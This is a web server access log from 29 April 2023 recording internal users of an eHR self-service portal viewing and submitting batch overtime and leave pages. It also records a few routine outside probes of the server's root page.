192.168.11.136 - - [29/Apr/2023:14:53:53 +0800] "GET /eHR/img/ares.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0"
192.168.11.136 - - [29/Apr/2023:14:53:53 +0800] "GET /eHR/img/ares.ico HTTP/1.1" 200 1406
192.168.11.136 - - [29/Apr/2023:14:53:52 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNH000 HTTP/1.1" 200 10431 "http://192.168.1.81:8088/eHR/ess/redirect.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0"
192.168.11.136 - - [29/Apr/2023:14:53:52 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNH000 HTTP/1.1" 200 10431
192.168.11.136 - - [29/Apr/2023:14:54:19 +0800] "GET /eHR/img/ares.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0"
192.168.11.136 - - [29/Apr/2023:14:54:19 +0800] "GET /eHR/img/ares.ico HTTP/1.1" 200 1406
192.168.11.136 - - [29/Apr/2023:14:53:58 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNE003&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 7833 "http://192.168.1.81:8088/eHR/ess/redirect.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0"
192.168.11.136 - - [29/Apr/2023:14:53:58 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNE003&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 7833
192.168.11.136 - - [29/Apr/2023:14:54:08 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNE003&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 7833 "http://192.168.1.81:8088/eHR/ess/redirect.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0"
192.168.11.136 - - [29/Apr/2023:14:54:08 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNE003&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 7833
192.168.11.136 - - [29/Apr/2023:14:54:08 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNE003&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 7833 "http://192.168.1.81:8088/eHR/ess/redirect.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0"
192.168.11.136 - - [29/Apr/2023:14:54:08 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNE003&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 7833
192.168.11.136 - - [29/Apr/2023:14:54:17 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNE003&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 7833
192.168.11.136 - - [29/Apr/2023:14:54:17 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNE003&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 7833 "http://192.168.1.81:8088/eHR/ess/redirect.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0"
192.168.11.136 - - [29/Apr/2023:14:54:17 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNE003&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 7833
192.168.11.136 - - [29/Apr/2023:14:54:17 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNE003&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 7833 "http://192.168.1.81:8088/eHR/ess/redirect.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0"
192.168.11.136 - - [29/Apr/2023:14:54:21 +0800] "GET /eHR/img/ares.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0"
192.168.11.136 - - [29/Apr/2023:14:54:21 +0800] "GET /eHR/img/ares.ico HTTP/1.1" 200 1406
192.168.11.136 - - [29/Apr/2023:14:54:27 +0800] "POST /eHR/ess/redirect.php?scriptname=ESNE003&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 16652 "http://192.168.1.81:8088/eHR/ess/redirect.php?scriptname=ESNE003&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E6%9F%A5%E8%AF%A2" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0"
192.168.11.136 - - [29/Apr/2023:14:54:27 +0800] "POST /eHR/ess/redirect.php?scriptname=ESNE003&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 16652
192.168.11.136 - - [29/Apr/2023:14:54:40 +0800] "POST /eHR/ess/redirect.php?scriptname=ESNE003&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 16652
192.168.11.136 - - [29/Apr/2023:14:54:40 +0800] "POST /eHR/ess/redirect.php?scriptname=ESNE003&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 16652 "http://192.168.1.81:8088/eHR/ess/redirect.php?scriptname=ESNE003&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E6%9F%A5%E8%AF%A2" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0"
192.168.11.136 - - [29/Apr/2023:14:54:53 +0800] "POST /eHR/ess/redirect.php?scriptname=ESNE003&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 33514 "http://192.168.1.81:8088/eHR/ess/redirect.php?scriptname=ESNE003&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E6%9F%A5%E8%AF%A2" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0"
192.168.11.136 - - [29/Apr/2023:14:54:53 +0800] "POST /eHR/ess/redirect.php?scriptname=ESNE003&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 33514
192.168.11.228 - - [29/Apr/2023:14:56:28 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNE002&appdesc=%E6%89%B9%E9%87%8F%E8%AF%B7%E5%81%87%E7%94%B3%E8%AF%B7 HTTP/1.1" 200 22066 "http://192.168.1.81:8088/eHR/ess/redirect.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.58"
192.168.11.228 - - [29/Apr/2023:14:56:28 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNE002&appdesc=%E6%89%B9%E9%87%8F%E8%AF%B7%E5%81%87%E7%94%B3%E8%AF%B7 HTTP/1.1" 200 22066
192.168.11.228 - - [29/Apr/2023:14:57:20 +0800] "GET /eHR/ess/redirect.php?scriptname=emp_lov&openW=Y&rand=0.010452948066343115 HTTP/1.1" 200 8728 "http://192.168.1.81:8088/eHR/ess/redirect.php?scriptname=ESNE002&appdesc=%E6%89%B9%E9%87%8F%E8%AF%B7%E5%81%87%E7%94%B3%E8%AF%B7" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.58"
192.168.11.228 - - [29/Apr/2023:14:57:20 +0800] "GET /eHR/ess/redirect.php?scriptname=emp_lov&openW=Y&rand=0.010452948066343115 HTTP/1.1" 200 8728
192.168.11.228 - - [29/Apr/2023:14:57:25 +0800] "POST /eHR/ess/redirect.php?scriptname=emp_lov&openW=Y&rand=0.010452948066343115 HTTP/1.1" 200 14146 "http://192.168.1.81:8088/eHR/ess/redirect.php?scriptname=emp_lov&openW=Y&rand=0.010452948066343115" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.58"
192.168.11.228 - - [29/Apr/2023:14:57:25 +0800] "POST /eHR/ess/redirect.php?scriptname=emp_lov&openW=Y&rand=0.010452948066343115 HTTP/1.1" 200 14146
192.168.11.228 - - [29/Apr/2023:14:57:30 +0800] "POST /eHR/ess/redirect.php?scriptname=ESNE002&appdesc=%E6%89%B9%E9%87%8F%E8%AF%B7%E5%81%87%E7%94%B3%E8%AF%B7 HTTP/1.1" 200 4192 "http://192.168.1.81:8088/eHR/ess/redirect.php?scriptname=ESNE002&appdesc=%E6%89%B9%E9%87%8F%E8%AF%B7%E5%81%87%E7%94%B3%E8%AF%B7" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.58"
192.168.11.228 - - [29/Apr/2023:14:57:30 +0800] "POST /eHR/ess/redirect.php?scriptname=ESNE002&appdesc=%E6%89%B9%E9%87%8F%E8%AF%B7%E5%81%87%E7%94%B3%E8%AF%B7 HTTP/1.1" 200 4192
192.168.11.228 - - [29/Apr/2023:15:01:18 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNE004&appdesc=%E6%89%B9%E9%87%8F%E8%AF%B7%E5%81%87%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 8177 "http://192.168.1.81:8088/eHR/ess/redirect.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.58"
192.168.11.228 - - [29/Apr/2023:15:01:18 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNE004&appdesc=%E6%89%B9%E9%87%8F%E8%AF%B7%E5%81%87%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 8177
192.168.11.228 - - [29/Apr/2023:15:01:23 +0800] "POST /eHR/ess/redirect.php?scriptname=ESNE004&appdesc=%E6%89%B9%E9%87%8F%E8%AF%B7%E5%81%87%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 77754 "http://192.168.1.81:8088/eHR/ess/redirect.php?scriptname=ESNE004&appdesc=%E6%89%B9%E9%87%8F%E8%AF%B7%E5%81%87%E6%9F%A5%E8%AF%A2" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.58"
192.168.11.228 - - [29/Apr/2023:15:01:23 +0800] "POST /eHR/ess/redirect.php?scriptname=ESNE004&appdesc=%E6%89%B9%E9%87%8F%E8%AF%B7%E5%81%87%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 77754
192.168.11.228 - - [29/Apr/2023:15:01:56 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNE003&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 7969 "http://192.168.1.81:8088/eHR/ess/redirect.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.58"
192.168.11.228 - - [29/Apr/2023:15:01:56 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNE003&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 7969
192.168.11.228 - - [29/Apr/2023:15:01:58 +0800] "POST /eHR/ess/redirect.php?scriptname=ESNE003&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 167299 "http://192.168.1.81:8088/eHR/ess/redirect.php?scriptname=ESNE003&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E6%9F%A5%E8%AF%A2" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.58"
192.168.11.228 - - [29/Apr/2023:15:01:58 +0800] "POST /eHR/ess/redirect.php?scriptname=ESNE003&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 167299
45.61.184.13 - - [29/Apr/2023:15:10:36 +0800] "GET / HTTP/1.0" 200 397 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.61.184.13 - - [29/Apr/2023:15:10:36 +0800] "GET / HTTP/1.0" 200 397
205.210.31.3 - - [29/Apr/2023:15:16:50 +0800] "\x16\x03\x01" 501 205 "-" "-"
205.210.31.3 - - [29/Apr/2023:15:16:50 +0800] "\x16\x03\x01" 501 205
45.61.184.13 - - [29/Apr/2023:15:36:09 +0800] "GET / HTTP/1.0" 200 397 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.61.184.13 - - [29/Apr/2023:15:36:09 +0800] "GET / HTTP/1.0" 200 397
45.61.184.13 - - [29/Apr/2023:15:40:55 +0800] "GET / HTTP/1.0" 200 397 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.61.184.13 - - [29/Apr/2023:15:40:55 +0800] "GET / HTTP/1.0" 200 397
192.168.11.226 - - [29/Apr/2023:16:55:32 +0800] "GET /eHR/ess/index.php?lang=ZHT HTTP/1.1" 200 8829 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
192.168.11.226 - - [29/Apr/2023:16:55:32 +0800] "GET /eHR/ess/index.php?lang=ZHT HTTP/1.1" 200 8829
192.168.11.226 - - [29/Apr/2023:16:55:41 +0800] "POST /eHR/ess/includes/login.php HTTP/1.1" 302 -
192.168.11.226 - - [29/Apr/2023:16:55:41 +0800] "POST /eHR/ess/includes/login.php HTTP/1.1" 302 - "http://192.168.1.81:8088/eHR/ess/index.php?lang=ZHT" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
192.168.11.226 - - [29/Apr/2023:16:55:52 +0800] "GET /eHR/ess/redirect.php HTTP/1.1" 200 8929 "http://192.168.1.81:8088/eHR/ess/index.php?lang=ZHT" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
192.168.11.226 - - [29/Apr/2023:16:55:52 +0800] "GET /eHR/ess/redirect.php HTTP/1.1" 200 8929
192.168.11.226 - - [29/Apr/2023:16:55:57 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNH000 HTTP/1.1" 200 -
192.168.11.226 - - [29/Apr/2023:16:56:01 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B HTTP/1.1" 200 139
192.168.11.226 - - [29/Apr/2023:16:55:57 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNH000 HTTP/1.1" 200 - "http://192.168.1.81:8088/eHR/ess/redirect.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
192.168.11.226 - - [29/Apr/2023:16:56:01 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B HTTP/1.1" 200 139 "http://192.168.1.81:8088/eHR/ess/redirect.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
192.168.11.226 - - [29/Apr/2023:16:56:50 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B HTTP/1.1" 200 139
192.168.11.226 - - [29/Apr/2023:16:56:50 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B HTTP/1.1" 200 139 "http://192.168.1.81:8088/eHR/ess/redirect.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
192.168.11.226 - - [29/Apr/2023:16:58:39 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B HTTP/1.1" 200 15271
192.168.11.226 - - [29/Apr/2023:16:58:39 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B HTTP/1.1" 200 15271 "http://192.168.1.81:8088/eHR/ess/redirect.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
192.168.11.226 - - [29/Apr/2023:16:58:42 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B HTTP/1.1" 200 15271 "http://192.168.1.81:8088/eHR/ess/redirect.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
192.168.11.226 - - [29/Apr/2023:16:58:42 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B HTTP/1.1" 200 15271
192.168.11.226 - - [29/Apr/2023:16:58:42 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B HTTP/1.1" 200 15271 "http://192.168.1.81:8088/eHR/ess/redirect.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
192.168.11.226 - - [29/Apr/2023:16:58:42 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B HTTP/1.1" 200 15271
192.168.11.226 - - [29/Apr/2023:16:58:44 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B HTTP/1.1" 200 15271 "http://192.168.1.81:8088/eHR/ess/redirect.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
192.168.11.226 - - [29/Apr/2023:16:58:44 +0800] "GET /eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B HTTP/1.1" 200 15271
192.168.11.226 - - [29/Apr/2023:16:59:01 +0800] "GET /eHR/ess/redirect.php?scriptname=emp_lov&openW=Y&rand=0.21180126446011882 HTTP/1.1" 200 52300 "http://192.168.1.81:8088/eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
192.168.11.226 - - [29/Apr/2023:16:59:01 +0800] "GET /eHR/ess/redirect.php?scriptname=emp_lov&openW=Y&rand=0.21180126446011882 HTTP/1.1" 200 52300
192.168.11.226 - - [29/Apr/2023:16:59:09 +0800] "POST /eHR/ess/redirect.php?scriptname=emp_lov&openW=Y&rand=0.21180126446011882 HTTP/1.1" 200 54480 "http://192.168.1.81:8088/eHR/ess/redirect.php?scriptname=emp_lov&openW=Y&rand=0.21180126446011882" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
192.168.11.226 - - [29/Apr/2023:16:59:09 +0800] "POST /eHR/ess/redirect.php?scriptname=emp_lov&openW=Y&rand=0.21180126446011882 HTTP/1.1" 200 54480
192.168.11.226 - - [29/Apr/2023:16:59:26 +0800] "POST /eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B HTTP/1.1" 200 139 "http://192.168.1.81:8088/eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
192.168.11.226 - - [29/Apr/2023:16:59:26 +0800] "POST /eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B HTTP/1.1" 200 139
192.168.11.226 - - [29/Apr/2023:16:59:27 +0800] "POST /eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B HTTP/1.1" 200 139 "http://192.168.1.81:8088/eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
192.168.11.226 - - [29/Apr/2023:16:59:27 +0800] "POST /eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B HTTP/1.1" 200 139
192.168.11.226 - - [29/Apr/2023:16:59:16 +0800] "POST /eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B HTTP/1.1" 200 -
192.168.11.226 - - [29/Apr/2023:16:59:16 +0800] "POST /eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B HTTP/1.1" 200 - "http://192.168.1.81:8088/eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
192.168.11.226 - - [29/Apr/2023:17:00:29 +0800] "POST /eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B HTTP/1.1" 200 139 "http://192.168.1.81:8088/eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
192.168.11.226 - - [29/Apr/2023:17:00:29 +0800] "POST /eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B HTTP/1.1" 200 139
192.168.11.226 - - [29/Apr/2023:17:00:30 +0800] "POST /eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B HTTP/1.1" 200 139 "http://192.168.1.81:8088/eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
192.168.11.226 - - [29/Apr/2023:17:00:30 +0800] "POST /eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B HTTP/1.1" 200 139
192.168.11.226 - - [29/Apr/2023:17:00:30 +0800] "POST /eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B HTTP/1.1" 200 139
192.168.11.226 - - [29/Apr/2023:17:00:30 +0800] "POST /eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B HTTP/1.1" 200 139 "http://192.168.1.81:8088/eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
192.168.11.226 - - [29/Apr/2023:17:00:30 +0800] "POST /eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B HTTP/1.1" 200 139 "http://192.168.1.81:8088/eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
192.168.11.226 - - [29/Apr/2023:17:00:30 +0800] "POST /eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B HTTP/1.1" 200 139
192.168.11.226 - - [29/Apr/2023:17:00:44 +0800] "POST /eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B HTTP/1.1" 200 4089 "http://192.168.1.81:8088/eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
192.168.11.226 - - [29/Apr/2023:17:00:44 +0800] "POST /eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B HTTP/1.1" 200 4089
